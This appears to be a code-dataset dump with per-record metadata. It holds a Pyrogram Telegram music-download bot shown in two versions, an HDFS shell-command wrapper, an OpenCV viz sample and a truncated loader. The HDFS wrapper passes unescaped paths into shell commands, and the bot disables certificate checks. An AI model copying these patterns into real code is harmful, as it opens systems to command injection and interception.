            reason_ = asplit[1]
    return user_s, reason_
def get_readable_time(seconds: int) -> str:
    """Render a second count as e.g. "1m:1s" or "2days, 3h:4m:5s".

    Returns "" for 0 seconds.
    """
    # BUGFIX: the return annotation said int, but the function has always
    # returned a string.
    count = 0
    ping_time = ""
    time_list = []
    time_suffix_list = ["s", "m", "h", "days"]
    while count < 4:
        count += 1
        # first two passes peel off seconds/minutes (base 60),
        # later passes peel off hours/days (base 24)
        if count < 3:
            remainder, result = divmod(seconds, 60)
        else:
            remainder, result = divmod(seconds, 24)
        if seconds == 0 and remainder == 0:
            break
        time_list.append(int(result))
        seconds = int(remainder)
    for x in range(len(time_list)):
        time_list[x] = str(time_list[x]) + time_suffix_list[x]
    if len(time_list) == 4:
        # days are comma-separated in front of the h:m:s part
        ping_time += time_list.pop() + ", "
    time_list.reverse()
    ping_time += ":".join(time_list)
    return ping_time
def time_formatter(milliseconds: int) -> str:
    """Render a millisecond duration as "1 day(s), 2 hour(s), ...".

    Zero-valued units are omitted; 0 ms yields "".
    """
    seconds, milliseconds = divmod(int(milliseconds), 1000)
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    # collect only the non-zero units, largest first
    parts = []
    for amount, unit in ((days, "day"), (hours, "hour"), (minutes, "minute"),
                         (seconds, "second"), (milliseconds, "millisecond")):
        if amount:
            parts.append("{0} {1}(s)".format(amount, unit))
    return ", ".join(parts)
# Module-level youtube_dl options: grab the best available audio stream,
# save the thumbnail, and transcode to 192 kbps MP3 via ffmpeg.
ydl_opts = {
    'format': 'bestaudio/best',
    'writethumbnail': True,
    'postprocessors': [{
        'key': 'FFmpegExtractAudio',
        'preferredcodec': 'mp3',
        'preferredquality': '192'
    }]
}
def get_file_extension_from_url(url):
    """Return the text after the final '.' in the URL path's basename.

    If the basename contains no dot, the whole basename is returned.
    """
    path = urlparse(url).path
    name = os.path.basename(path)
    return name.rsplit(".", 1)[-1]
# Function to download a song file from a direct media URL.
async def download_song(url):
    """Download *url* to a randomly named local MP3 file.

    :returns: the filename on success, or None (implicitly) when the
        server does not answer with HTTP 200
    """
    song_name = f"{randint(6969, 6999)}.mp3"
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as resp:
            if resp.status == 200:
                # BUGFIX: use the async context manager so the file handle
                # is closed even if the write fails (was open/write/close)
                async with aiofiles.open(song_name, mode='wb') as f:
                    await f.write(await resp.read())
                return song_name
is_downloading = False
def time_to_seconds(time):
    """Convert an "h:m:s"-style value (or a plain number) to total seconds."""
    # Horner-style accumulation over the colon-separated fields
    total = 0
    for field in str(time).split(':'):
        total = total * 60 + int(field)
    return total
@Client.on_message(filters.command("saavn") & ~filters.edited)
async def jssong(_, message):
    """Handle /saavn: search JioSaavn via ARQ and reply with the audio file."""
    global is_downloading
    if len(message.command) < 2:
        await message.reply_text("/saavn requires an argument.")
        return
    if is_downloading:
        # single global lock serialises downloads across all chats
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    is_downloading = True
    text = message.text.split(None, 1)[1]
    query = text.replace(" ", "%20")
    m = await message.reply_text("Searching...")
    try:
        # NOTE(review): `arq` is not defined in this file — presumably an
        # ARQ client instance created elsewhere; confirm it is in scope.
        songs = await arq.saavn(query)
        sname = songs[0].song
        slink = songs[0].media_url
        ssingers = songs[0].singers
        await m.edit("Downloading")
        song = await download_song(slink)
        await m.edit("Uploading")
        await message.reply_audio(audio=song, title=sname,
                                  performer=ssingers)
        os.remove(song)
        await m.delete()
    except Exception as e:
        # release the lock and surface the error text to the user
        is_downloading = False
        await m.edit(str(e))
        return
    is_downloading = False
# Deezer Music
@Client.on_message(filters.command("deezer") & ~filters.edited)
async def deezsong(_, message):
    """Handle /deezer: search Deezer via ARQ and reply with the audio file."""
    global is_downloading
    if len(message.command) < 2:
        await message.reply_text("/deezer requires an argument.")
        return
    if is_downloading:
        # single global lock serialises downloads across all chats
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    is_downloading = True
    text = message.text.split(None, 1)[1]
    query = text.replace(" ", "%20")
    m = await message.reply_text("Searching...")
    try:
        # NOTE(review): `arq` is not defined in this file — presumably an
        # ARQ client instance created elsewhere; confirm it is in scope.
        songs = await arq.deezer(query, 1)
        title = songs[0].title
        url = songs[0].url
        artist = songs[0].artist
        await m.edit("Downloading")
        song = await download_song(url)
        await m.edit("Uploading")
        await message.reply_audio(audio=song, title=title,
                                  performer=artist)
        os.remove(song)
        await m.delete()
    except Exception as e:
        # release the lock and surface the error text to the user
        is_downloading = False
        await m.edit(str(e))
        return
    is_downloading = False
@Client.on_message(filters.command(["vsong", "vid"]))
async def ytmusic(client,message: Message):
    """Handle /vsong and /vid: search YouTube, download the video (max 8
    minutes) with youtube_dl and reply with it as a streamable MP4."""
    global is_downloading
    if is_downloading:
        # single global lock serialises downloads across all chats
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    urlissed = get_text(message)
    pablo = await client.send_message(
        message.chat.id,
        f"`Getting {urlissed} From Youtube Servers. Please Wait.`")
    if not urlissed:
        await pablo.edit("Invalid Command Syntax, Please Check Help Menu To Know More!")
        return
    search = SearchVideos(f"{urlissed}", offset=1, mode="dict", max_results=1)
    mi = search.result()
    mio = mi["search_result"]
    mo = mio[0]["link"]
    thum = mio[0]["title"]
    fridayz = mio[0]["id"]
    thums = mio[0]["channel"]
    # hqdefault thumbnail derived from the video id
    kekme = f"https://img.youtube.com/vi/{fridayz}/hqdefault.jpg"
    await asyncio.sleep(0.6)
    url = mo
    sedlyf = wget.download(kekme)
    # youtube_dl options: best single stream, remuxed to mp4, quiet logs
    opts = {
        "format": "best",
        "addmetadata": True,
        "key": "FFmpegMetadata",
        "prefer_ffmpeg": True,
        "geo_bypass": True,
        "nocheckcertificate": True,
        "postprocessors": [
            {"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
        ],
        "outtmpl": "%(id)s.mp4",
        "logtostderr": False,
        "quiet": True,
    }
    try:
        is_downloading = True
        with youtube_dl.YoutubeDL(opts) as ytdl:
            infoo = ytdl.extract_info(url, False)
            duration = round(infoo["duration"] / 60)
            if duration > 8:
                # enforce the 8-minute limit before downloading anything
                await pablo.edit(
                    f"❌ Videos longer than 8 minute(s) aren't allowed, the provided video is {duration} minute(s)"
                )
                is_downloading = False
                return
            ytdl_data = ytdl.extract_info(url, download=True)
    except Exception as e:
        #await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
        is_downloading = False
        return
    c_time = time.time()
    file_stark = f"{ytdl_data['id']}.mp4"
    capy = f"𝐕𝐢𝐝𝐞𝐨 𝐍𝐚𝐦𝐞 : `{thum}` \n\n𝐑𝐞𝐪𝐮𝐞𝐬𝐭𝐞𝐝 𝐍𝐚𝐦𝐞: `{urlissed}` \n\n𝐘𝐓 𝐜𝐡𝐚𝐧𝐧𝐞𝐥: `{thums}` \n\n𝐋𝐢𝐧𝐤 : `{mo}` \n\n🎼𝐔𝐩𝐥𝐨𝐚𝐝𝐞𝐝 𝐁𝐲 **@CoderzHEX**"
    # NOTE(review): the open() handle below is never closed, and if
    # send_video raises, is_downloading stays True forever — both worth
    # fixing upstream.
    await client.send_video(message.chat.id, video = open(file_stark, "rb"), duration = int(ytdl_data["duration"]), file_name = str(ytdl_data["title"]), thumb = sedlyf, caption = capy, supports_streaming = True , progress=progress, progress_args=(pablo, c_time, f'`Uploading {urlissed} Song From YouTube Music!`', file_stark))
    await pablo.delete()
    is_downloading = False
    # remove the downloaded thumbnail and video files
    for files in (sedlyf, file_stark):
        if files and os.path.exists(files):
            os.remove(files)
|
from __future__ import unicode_literals
import os
import requests
import aiohttp
import youtube_dl
import wget
import math
from pyrogram import filters, Client
from youtube_search import YoutubeSearch
from Python_ARQ import ARQ
from urllib.parse import urlparse
import aiofiles
import os
from random import randint
from youtubesearchpython import SearchVideos
from pyrogram.errors import FloodWait, MessageNotModified
from pyrogram.types import Chat, Message, User
import asyncio
from typing import Callable, Coroutine, Dict, List, Tuple, Union
import sys
import time
from helpers.errors import DurationLimitError
@Client.on_message(filters.command('song') & ~filters.channel)
def song(client, message):
    """Handle /song: search YouTube for the query text, download the best
    m4a audio stream with youtube_dl and reply with it as an audio message.
    Temporary audio/thumbnail files are removed best-effort afterwards."""
    # rebuild the query from the command arguments
    query = ''
    for i in message.command[1:]:
        query += ' ' + str(i)
    print(query)
    m = message.reply('🔎 Finding the song...\n\n@CoderzHex')
    ydl_opts = {"format": "bestaudio[ext=m4a]"}
    try:
        results = YoutubeSearch(query, max_results=1).to_dict()
        link = f"https://youtube.com{results[0]['url_suffix']}"
        title = results[0]["title"][:40]
        thumbnail = results[0]["thumbnails"][0]
        thumb_name = f'thumb{title}.jpg'
        thumb = requests.get(thumbnail, allow_redirects=True)
        # BUGFIX: use a context manager so the thumbnail file handle is
        # closed (was: open(...).write(...), which leaked the handle)
        with open(thumb_name, 'wb') as thumb_file:
            thumb_file.write(thumb.content)
        duration = results[0]["duration"]
    except Exception as e:
        m.edit(
            "❌ Found Nothing.\nCheck Your Name or spelling"
        )
        print(str(e))
        return
    m.edit("**📥 Downloading the song**\n\n@CoderzHex")
    try:
        with youtube_dl.YoutubeDL(ydl_opts) as ydl:
            info_dict = ydl.extract_info(link, download=False)
            audio_file = ydl.prepare_filename(info_dict)
            ydl.process_info(info_dict)
        rep = '**🎧 Uploaded by @CoderzHEX **'
        # convert the "h:m:s"-style duration string into total seconds
        secmul, dur, dur_arr = 1, 0, duration.split(':')
        for i in range(len(dur_arr)-1, -1, -1):
            dur += (int(dur_arr[i]) * secmul)
            secmul *= 60
        message.reply_audio(audio_file, caption=rep, thumb=thumb_name, parse_mode='md', title=title, duration=dur)
        m.delete()
    except Exception as e:
        m.edit('❌ Error')
        print(e)
    # best-effort cleanup; files may be absent if an earlier step failed
    try:
        os.remove(audio_file)
        os.remove(thumb_name)
    except Exception as e:
        print(e)
def get_text(message: "Message") -> "str | None":
    """Return the argument portion of a command message.

    Splits ``message.text`` on the first run of whitespace and returns
    everything after the command itself, or ``None`` when the message has
    no text or carries no argument.

    Fix: the original return annotation ``[None, str]`` was a runtime list
    literal, not a type; annotations are now strings so the module imports
    without pyrogram installed.
    """
    if message.text is None:
        return None
    # A command with no argument at all ("/song") contains no space.
    if " " not in message.text:
        return None
    parts = message.text.split(None, 1)
    # "/song " (trailing spaces only) splits to one element: no argument.
    return parts[1] if len(parts) > 1 else None
def humanbytes(size):
    """Render a byte count as a human-readable string (e.g. "2.0 KiB").

    Returns "" for a falsy size (0 or None).
    """
    if not size:
        return ""
    step = 2 ** 10
    prefixes = {0: "", 1: "Ki", 2: "Mi", 3: "Gi", 4: "Ti"}
    exponent = 0
    # Divide down by 1024 until the value fits under one step.
    while size > step:
        size /= step
        exponent += 1
    return f"{round(size, 2)} {prefixes[exponent]}B"
async def progress(current, total, message, start, type_of_ps, file_name=None):
    """Edit *message* with an upload/download progress bar.

    Intended as a pyrogram progress callback: *current*/*total* are bytes,
    *start* is the transfer start timestamp, *type_of_ps* is the status
    caption. Updates are throttled to roughly every 10 seconds.
    """
    now = time.time()
    diff = now - start
    # Only refresh when ~10s have elapsed, plus once at completion.
    if round(diff % 10.00) == 0 or current == total:
        percentage = current * 100 / total
        speed = current / diff
        elapsed_time = round(diff) * 1000
        if elapsed_time == 0:
            return
        time_to_completion = round((total - current) / speed) * 1000
        estimated_total_time = elapsed_time + time_to_completion
        # Ten-cell bar: filled blocks for completed tenths, light blocks after.
        progress_str = "{0}{1} {2}%\n".format(
            "".join(["█" for i in range(math.floor(percentage / 10))]),
            "".join(["░" for i in range(10 - math.floor(percentage / 10))]),
            round(percentage, 2),
        )
        tmp = progress_str + "{0} of {1}\nETA: {2}".format(
            humanbytes(current), humanbytes(total), time_formatter(estimated_total_time)
        )
        if file_name:
            try:
                await message.edit(
                    "{}\n**File Name:** `{}`\n{}".format(type_of_ps, file_name, tmp)
                )
            except FloodWait as e:
                # Back off for the duration Telegram demands.
                await asyncio.sleep(e.x)
            except MessageNotModified:
                pass
        else:
            try:
                await message.edit("{}\n{}".format(type_of_ps, tmp))
            except FloodWait as e:
                await asyncio.sleep(e.x)
            except MessageNotModified:
                pass
def get_user(message: "Message", text: str) -> "tuple":
    """Extract a target user and an optional reason from a command.

    A replied-to message takes priority: its author's id is the user and
    *text* (if any) is the reason. Otherwise the first token of *text* is
    the user (an ``int`` id when numeric, a username string otherwise) and
    the remainder, if present, is the reason.

    Fix: the original return annotation ``[int, str, None]`` was a runtime
    list literal, not a type; annotations are now strings so the module
    imports without pyrogram installed.

    Returns:
        ``(user, reason)`` where user is int | str | None and reason is
        str | None.
    """
    asplit = None if text is None else text.split(" ", 1)
    user_s = None
    reason_ = None
    if message.reply_to_message:
        user_s = message.reply_to_message.from_user.id
        reason_ = text if text else None
    elif asplit is None:
        return None, None
    elif len(asplit[0]) > 0:
        user_s = int(asplit[0]) if asplit[0].isdigit() else asplit[0]
        if len(asplit) == 2:
            reason_ = asplit[1]
    return user_s, reason_
def get_readable_time(seconds: int) -> str:
    """Format a duration in seconds, e.g. 3661 -> "1h:1m:1s".

    Fix: the original annotated the return type as ``int`` although the
    function builds and returns a string; the divmod results were also
    named backwards (quotient called "remainder"). Behavior is unchanged.
    """
    count = 0
    ping_time = ""
    time_list = []
    time_suffix_list = ["s", "m", "h", "days"]
    while count < 4:
        count += 1
        # Carry seconds→minutes→hours in base 60, then hours→days in base 24.
        if count < 3:
            quotient, result = divmod(seconds, 60)
        else:
            quotient, result = divmod(seconds, 24)
        if seconds == 0 and quotient == 0:
            break
        time_list.append(int(result))
        seconds = int(quotient)
    # Attach unit suffixes smallest-first, matching their append order.
    for x in range(len(time_list)):
        time_list[x] = str(time_list[x]) + time_suffix_list[x]
    if len(time_list) == 4:
        # Days get a comma separator: "Ndays, h:m:s".
        ping_time += time_list.pop() + ", "
    time_list.reverse()
    ping_time += ":".join(time_list)
    return ping_time
def time_formatter(milliseconds: int) -> str:
    """Convert a duration in milliseconds to a human-readable string.

    Only nonzero components are included, largest first, joined by ", ".
    """
    seconds, milliseconds = divmod(int(milliseconds), 1000)
    minutes, seconds = divmod(seconds, 60)
    hours, minutes = divmod(minutes, 60)
    days, hours = divmod(hours, 24)
    units = (
        (days, "day(s)"),
        (hours, "hour(s)"),
        (minutes, "minute(s)"),
        (seconds, "second(s)"),
        (milliseconds, "millisecond(s)"),
    )
    return ", ".join(f"{value} {label}" for value, label in units if value)
# Module-level youtube-dl options: take the best audio stream, keep the
# thumbnail, and transcode to 192 kbps MP3 via the ffmpeg postprocessor.
ydl_opts = {
    'format': 'bestaudio/best',
    'writethumbnail': True,
    'postprocessors': [{
        'key': 'FFmpegExtractAudio',
        'preferredcodec': 'mp3',
        'preferredquality': '192'
    }]
}
def get_file_extension_from_url(url):
    """Return the text after the last dot in the URL path's basename.

    A basename without a dot is returned unchanged.
    """
    path = urlparse(url).path
    return os.path.basename(path).rsplit(".", 1)[-1]
# Function to download a song file from a direct URL (used by /saavn, /deezer).
async def download_song(url):
    """Fetch *url* into a randomly named local .mp3 and return the filename.

    Implicitly returns None when the server does not answer 200 OK.
    """
    song_name = f"{randint(6969, 6999)}.mp3"
    async with aiohttp.ClientSession() as session:
        async with session.get(url) as resp:
            if resp.status == 200:
                f = await aiofiles.open(song_name, mode='wb')
                await f.write(await resp.read())
                await f.close()
                return song_name
# Module-wide busy flag: download handlers refuse new jobs while one runs.
is_downloading = False
def time_to_seconds(time):
    """Convert an "hh:mm:ss"-style value to total seconds (Horner's scheme)."""
    total = 0
    for part in str(time).split(':'):
        total = total * 60 + int(part)
    return total
@Client.on_message(filters.command("saavn") & ~filters.edited)
async def jssong(_, message):
    """/saavn <query> — search JioSaavn and reply with the first result's audio.

    NOTE(review): ``arq`` is not defined in this module (only the ARQ class
    is imported) — presumably a client instance created elsewhere; confirm.
    """
    global is_downloading
    if len(message.command) < 2:
        await message.reply_text("/saavn requires an argument.")
        return
    # Single-slot lock shared by all download handlers.
    if is_downloading:
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    is_downloading = True
    text = message.text.split(None, 1)[1]
    query = text.replace(" ", "%20")
    m = await message.reply_text("Searching...")
    try:
        songs = await arq.saavn(query)
        sname = songs[0].song
        slink = songs[0].media_url
        ssingers = songs[0].singers
        await m.edit("Downloading")
        song = await download_song(slink)
        await m.edit("Uploading")
        await message.reply_audio(audio=song, title=sname,
                                  performer=ssingers)
        os.remove(song)
        await m.delete()
    except Exception as e:
        # Release the lock before surfacing the error to the user.
        is_downloading = False
        await m.edit(str(e))
        return
    is_downloading = False
# Deezer Music
@Client.on_message(filters.command("deezer") & ~filters.edited)
async def deezsong(_, message):
    """/deezer <query> — search Deezer and reply with the first result's audio.

    NOTE(review): ``arq`` is not defined in this module (only the ARQ class
    is imported) — presumably a client instance created elsewhere; confirm.
    """
    global is_downloading
    if len(message.command) < 2:
        await message.reply_text("/deezer requires an argument.")
        return
    # Single-slot lock shared by all download handlers.
    if is_downloading:
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    is_downloading = True
    text = message.text.split(None, 1)[1]
    query = text.replace(" ", "%20")
    m = await message.reply_text("Searching...")
    try:
        songs = await arq.deezer(query, 1)
        title = songs[0].title
        url = songs[0].url
        artist = songs[0].artist
        await m.edit("Downloading")
        song = await download_song(url)
        await m.edit("Uploading")
        await message.reply_audio(audio=song, title=title,
                                  performer=artist)
        os.remove(song)
        await m.delete()
    except Exception as e:
        # Release the lock before surfacing the error to the user.
        is_downloading = False
        await m.edit(str(e))
        return
    is_downloading = False
@Client.on_message(filters.command(["vsong", "vid"]))
async def ytmusic(client,message: Message):
    """/vsong or /vid <query> — search YouTube and upload the first video.

    Videos longer than 8 minutes are rejected before downloading.
    """
    global is_downloading
    if is_downloading:
        await message.reply_text("Another download is in progress, try again after sometime.")
        return
    urlissed = get_text(message)
    pablo = await client.send_message(
        message.chat.id,
        f"`Getting {urlissed} From Youtube Servers. Please Wait.`")
    if not urlissed:
        await pablo.edit("Invalid Command Syntax, Please Check Help Menu To Know More!")
        return
    search = SearchVideos(f"{urlissed}", offset=1, mode="dict", max_results=1)
    mi = search.result()
    mio = mi["search_result"]
    mo = mio[0]["link"]
    thum = mio[0]["title"]
    fridayz = mio[0]["id"]
    thums = mio[0]["channel"]
    # Standard YouTube thumbnail URL for the found video id.
    kekme = f"https://img.youtube.com/vi/{fridayz}/hqdefault.jpg"
    await asyncio.sleep(0.6)
    url = mo
    sedlyf = wget.download(kekme)
    opts = {
        "format": "best",
        "addmetadata": True,
        "key": "FFmpegMetadata",
        "prefer_ffmpeg": True,
        "geo_bypass": True,
        "nocheckcertificate": True,
        "postprocessors": [
            {"key": "FFmpegVideoConvertor", "preferedformat": "mp4"}
        ],
        "outtmpl": "%(id)s.mp4",
        "logtostderr": False,
        "quiet": True,
    }
    try:
        is_downloading = True
        with youtube_dl.YoutubeDL(opts) as ytdl:
            # First pass fetches metadata only, to enforce the duration cap.
            infoo = ytdl.extract_info(url, False)
            duration = round(infoo["duration"] / 60)
            if duration > 8:
                await pablo.edit(
                    f"❌ Videos longer than 8 minute(s) aren't allowed, the provided video is {duration} minute(s)"
                )
                is_downloading = False
                return
            # Second pass actually downloads the file.
            ytdl_data = ytdl.extract_info(url, download=True)
    except Exception as e:
        #await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
        is_downloading = False
        return
    c_time = time.time()
    file_stark = f"{ytdl_data['id']}.mp4"
    capy = f"𝐕𝐢𝐝𝐞𝐨 𝐍𝐚𝐦𝐞 : `{thum}` \n\n𝐑𝐞𝐪𝐮𝐞𝐬𝐭𝐞𝐝 𝐍𝐚𝐦𝐞: `{urlissed}` \n\n𝐘𝐓 𝐜𝐡𝐚𝐧𝐧𝐞𝐥: `{thums}` \n\n𝐋𝐢𝐧𝐤 : `{mo}` \n\n🎼𝐔𝐩𝐥𝐨𝐚𝐝𝐞𝐝 𝐁𝐲 **@CoderzHEX**"
    await client.send_video(message.chat.id, video = open(file_stark, "rb"), duration = int(ytdl_data["duration"]), file_name = str(ytdl_data["title"]), thumb = sedlyf, caption = capy, supports_streaming = True , progress=progress, progress_args=(pablo, c_time, f'`Uploading {urlissed} Song From YouTube Music!`', file_stark))
    await pablo.delete()
    is_downloading = False
    # Remove the thumbnail and the downloaded video from disk.
    for files in (sedlyf, file_stark):
        if files and os.path.exists(files):
            os.remove(files)
|
en
| 0.197836
|
#print(results) # Funtion To Download Song # Deezer Music #await pablo.edit(event, f"**Failed To Download** \n**Error :** `{str(e)}`")
| 2.465405
| 2
|
meutils/cmds/hdfs_cmd.py
|
Jie-Yuan/MeUtils
| 3
|
6628086
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : MeUtils.
# @File : hdfs_cmd
# @Time : 2021/1/20 10:15 上午
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
from meutils.pipe import *
class HDFS(object):
    """Thin wrapper around the ``hdfs dfs`` command-line client.

    Commands are executed through the module-level ``magic_cmd`` shell
    helper (star-imported from ``meutils.pipe`` at the top of the file).
    """

    # Client location and cluster name, overridable via the environment.
    HADOOP_HOME = os.environ.get('HADOOP_HOME', '~/infra-client/bin')
    HDFS_CLUSTER_NAME = os.environ.get('HDFS_CLUSTER_NAME', 'zjyprc-hadoop')
    HDFS_CMD = f"{HADOOP_HOME}/hdfs --cluster {HDFS_CLUSTER_NAME} dfs"  # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs"

    @classmethod
    def check_path_isexist(cls, path):
        """Return True when *path* exists on HDFS (shell ``-test -e``)."""
        cmd = f"-test -e {path}"  # includes files and dirs; use -test -d for dirs only
        status, output = cls.magic_cmd(cmd)
        rst = False if status != 0 else True
        logger.info(f'Path Exist: {rst}')
        return rst

    @classmethod
    def touchz(cls, path):
        """Create an empty file at *path* (shell ``-touchz``).

        :param path: /user/h_browser/algo/yuanjie/jars/xx.txt
        :return: (status, output) pair from the shell helper
        """
        cmd = f"-touchz {path}"
        return cls.magic_cmd(cmd)

    @classmethod
    def wc_l(cls, path):
        """Count lines of the file(s) matching *path* (``-cat | wc -l``).

        :param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/*
        :return: (status, output) pair; output carries the count
        """
        cmd = f"-cat {path} | wc -l"
        return cls.magic_cmd(cmd)

    @classmethod
    def magic_cmd(cls, cmd):
        """Prefix *cmd* with the hdfs client invocation and execute it.

        NOTE(review): delegates to the module-level ``magic_cmd`` from
        ``meutils.pipe`` (star import), which this classmethod shadows.

        :param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv
        :return: (status, output) pair
        """
        cmd = f"{cls.HDFS_CMD} {cmd}"
        return magic_cmd(cmd)

    @classmethod
    def push2hdfs(cls, input, output):
        """Upload *input* into *output*, then drop a _SUCCESS marker file."""
        cls.magic_cmd(f"-mkdir -p {output}")
        cls.magic_cmd(f"-put -f {input} {output}")
        cls.touchz(f"{output}/_SUCCESS")
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Project : MeUtils.
# @File : hdfs_cmd
# @Time : 2021/1/20 10:15 上午
# @Author : yuanjie
# @Email : <EMAIL>
# @Software : PyCharm
# @Description :
from meutils.pipe import *
class HDFS(object):
    """Thin wrapper around the ``hdfs dfs`` command-line client.

    Commands are executed through the module-level ``magic_cmd`` shell
    helper (star-imported from ``meutils.pipe`` at the top of the file).
    """

    # Client location and cluster name, overridable via the environment.
    HADOOP_HOME = os.environ.get('HADOOP_HOME', '~/infra-client/bin')
    HDFS_CLUSTER_NAME = os.environ.get('HDFS_CLUSTER_NAME', 'zjyprc-hadoop')
    HDFS_CMD = f"{HADOOP_HOME}/hdfs --cluster {HDFS_CLUSTER_NAME} dfs"  # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs"

    @classmethod
    def check_path_isexist(cls, path):
        """Return True when *path* exists on HDFS (shell ``-test -e``)."""
        cmd = f"-test -e {path}"  # includes files and dirs; use -test -d for dirs only
        status, output = cls.magic_cmd(cmd)
        rst = False if status != 0 else True
        logger.info(f'Path Exist: {rst}')
        return rst

    @classmethod
    def touchz(cls, path):
        """Create an empty file at *path* (shell ``-touchz``).

        :param path: /user/h_browser/algo/yuanjie/jars/xx.txt
        :return: (status, output) pair from the shell helper
        """
        cmd = f"-touchz {path}"
        return cls.magic_cmd(cmd)

    @classmethod
    def wc_l(cls, path):
        """Count lines of the file(s) matching *path* (``-cat | wc -l``).

        :param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/*
        :return: (status, output) pair; output carries the count
        """
        cmd = f"-cat {path} | wc -l"
        return cls.magic_cmd(cmd)

    @classmethod
    def magic_cmd(cls, cmd):
        """Prefix *cmd* with the hdfs client invocation and execute it.

        NOTE(review): delegates to the module-level ``magic_cmd`` from
        ``meutils.pipe`` (star import), which this classmethod shadows.

        :param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv
        :return: (status, output) pair
        """
        cmd = f"{cls.HDFS_CMD} {cmd}"
        return magic_cmd(cmd)

    @classmethod
    def push2hdfs(cls, input, output):
        """Upload *input* into *output*, then drop a _SUCCESS marker file."""
        cls.magic_cmd(f"-mkdir -p {output}")
        cls.magic_cmd(f"-put -f {input} {output}")
        cls.touchz(f"{output}/_SUCCESS")
|
en
| 0.240426
|
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Project : MeUtils. # @File : hdfs_cmd # @Time : 2021/1/20 10:15 上午 # @Author : yuanjie # @Email : <EMAIL> # @Software : PyCharm # @Description : # f"{HADOOP_HOME}/hadoop --cluster {HDFS_CLUSTER_NAME} fs" # 包含?-test -d :param path: /user/h_browser/algo/yuanjie/jars/xx.txt :return: :param path: /user/h_data_platform/platform/browser/push_group/locals/江苏_南京/date=20210120/* :return: :param cmd: -cat /user/h_browser/algo/yuanjie/jars/vec.csv :return:
| 2.313786
| 2
|
modules/viz/samples/viz_sample_02.py
|
pccvlab/opencv_contrib
| 7,158
|
6628087
|
<filename>modules/viz/samples/viz_sample_02.py<gh_stars>1000+
import numpy as np
import cv2 as cv

# OpenCV viz sample: show a coordinate frame, a diagonal line and a cube,
# then animate the cube's rotation and translation until the window closes.
my_window = cv.viz_Viz3d("Coordinate Frame")
axe = cv.viz_WCoordinateSystem()
# Diagonal reference line from (-1,-1,-1) to (1,1,1), drawn green.
axis = cv.viz_WLine((-1.0,-1.0,-1.0), (1.0,1.0,1.0), cv.viz_Color().green())
axis.setRenderingProperty(cv.viz.LINE_WIDTH, 4.0);
my_window.showWidget("axe",axis)
plan = cv.viz_WPlane((-1.0,-1.0,-1.0), (1.0,.0,.0), (-.0,.0,-1.0))
#my_window.showWidget("plan", plan)
cube = cv.viz_WCube((0.5,0.5,0.0), (0.0,0.0,-0.5), True, cv.viz_Color().blue())
my_window.showWidget("Cube Widget",cube)
pi = np.arccos(-1)
print("First event loop is over")
my_window.spin()  # blocks until the user quits the window
print("Second event loop is over")
my_window.spinOnce(1, True)
translation_phase = 0.0
translation = 0.0
rot_mat = np.zeros(shape=(3, 3), dtype=np.float32)  # NOTE(review): unused below
rot_vec = np.zeros(shape=(1,3),dtype=np.float32)
# Animation loop: increment the rotation vector and slide the cube along
# the diagonal with a sinusoidal translation each frame.
while not my_window.wasStopped():
    rot_vec[0, 0] += np.pi * 0.01
    rot_vec[0, 1] += np.pi * 0.01
    rot_vec[0, 2] += np.pi * 0.01
    translation_phase += pi * 0.01
    translation = np.sin(translation_phase)
    pose = cv.viz_Affine3d(rot_vec, (translation, translation, translation))
    my_window.setWidgetPose("Cube Widget",pose)
    my_window.spinOnce(1, True);
print("Last event loop is over")
|
<filename>modules/viz/samples/viz_sample_02.py<gh_stars>1000+
import numpy as np
import cv2 as cv

# OpenCV viz sample: show a coordinate frame, a diagonal line and a cube,
# then animate the cube's rotation and translation until the window closes.
my_window = cv.viz_Viz3d("Coordinate Frame")
axe = cv.viz_WCoordinateSystem()
# Diagonal reference line from (-1,-1,-1) to (1,1,1), drawn green.
axis = cv.viz_WLine((-1.0,-1.0,-1.0), (1.0,1.0,1.0), cv.viz_Color().green())
axis.setRenderingProperty(cv.viz.LINE_WIDTH, 4.0);
my_window.showWidget("axe",axis)
plan = cv.viz_WPlane((-1.0,-1.0,-1.0), (1.0,.0,.0), (-.0,.0,-1.0))
#my_window.showWidget("plan", plan)
cube = cv.viz_WCube((0.5,0.5,0.0), (0.0,0.0,-0.5), True, cv.viz_Color().blue())
my_window.showWidget("Cube Widget",cube)
pi = np.arccos(-1)
print("First event loop is over")
my_window.spin()  # blocks until the user quits the window
print("Second event loop is over")
my_window.spinOnce(1, True)
translation_phase = 0.0
translation = 0.0
rot_mat = np.zeros(shape=(3, 3), dtype=np.float32)  # NOTE(review): unused below
rot_vec = np.zeros(shape=(1,3),dtype=np.float32)
# Animation loop: increment the rotation vector and slide the cube along
# the diagonal with a sinusoidal translation each frame.
while not my_window.wasStopped():
    rot_vec[0, 0] += np.pi * 0.01
    rot_vec[0, 1] += np.pi * 0.01
    rot_vec[0, 2] += np.pi * 0.01
    translation_phase += pi * 0.01
    translation = np.sin(translation_phase)
    pose = cv.viz_Affine3d(rot_vec, (translation, translation, translation))
    my_window.setWidgetPose("Cube Widget",pose)
    my_window.spinOnce(1, True);
print("Last event loop is over")
|
en
| 0.260315
|
#my_window.showWidget("plan", plan)
| 2.361356
| 2
|
data/loader.py
|
jkulhanek/soloist
| 3
|
6628088
|
import os
import functools
import logging
from data.utils import ConcatDialogDataset, split_name, wrap_dataset_with_blacklist
RESTRICTED_DOMAINS = ['hotel', 'train', 'restaurant', 'attraction', 'taxi',
